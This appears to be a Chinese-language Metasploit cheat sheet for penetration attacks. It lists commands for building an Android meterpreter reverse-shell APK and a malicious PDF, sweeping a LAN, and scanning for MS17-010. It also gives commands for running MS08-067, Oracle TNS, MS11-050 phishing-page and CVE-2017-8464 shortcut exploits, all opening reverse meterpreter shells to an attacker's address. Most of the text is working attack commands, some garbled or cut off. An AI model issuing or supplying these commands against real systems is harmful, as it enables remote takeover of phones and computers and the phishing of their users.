metasploit安卓渗透
msfvenom -p android/meterpreter/reverse_tcp LHOST=........ LPORT=4444 R> /sdcard/hack,apk
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.18.250
set LPORT 12345
exploit
use exploit/windows/fileformat/adobe_cooltype_sing LHOST LPORT R> /sdcard/pdf.pdf
利用Metasploit进行局域网活动主机扫描
msf > use auxiliary/scanner/discovery/arp_sweep
msf > show options
msf auxiliary(arp_sweep) > set RHOSTS 192.168.0.0/24 /*设置目标IP 此处扫描192.168.0网段的所
msf auxiliary(arp_sweep) > set THREADS 50 /*设置线程 */
内网扫描存在ms17010漏洞
auxiliary/scanner/smb/smb_ms17_010
缓冲区溢出漏洞win xp sp3
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
ms12042存在与Windows xp和Windows server 2003的所有32位版本、及Windows 7(由于基于x64的系统)以及Windows server 2008 R2 x64
该漏洞是Windows 内核中的漏洞,可能允许特权提升,Windows用户模式调度程序存在内存破环漏洞.
oracle漏洞cve-2009-1979
search tns_auth
use exploit/windows/oracle/tns_auth_sesskey
set payload windows/meterpreter/reverse_tcp
IE漏洞(MS11-050)在msf工具加载攻击模块和载荷模块,构建钓鱼网页。
search ms11-050
use exploit/windows/browser/ms11_050_mshtml_cobjectelement
set payload windows/meterpreter/reverse_tcp
show options
set srvhost 192.168.1.100 设置自己的服务器地址,这里设置本机为服务器
set rhost 192.168.1.10
set lhost 192.168.1.100
set uripath index.html 伪造网页地址
CVE-2017-8464震网三代(远程快捷方式漏洞)
当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
search 2017_8464
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.10.118(你的IP)
exploit
之后会在/root/.msf4/local目录下生成我们的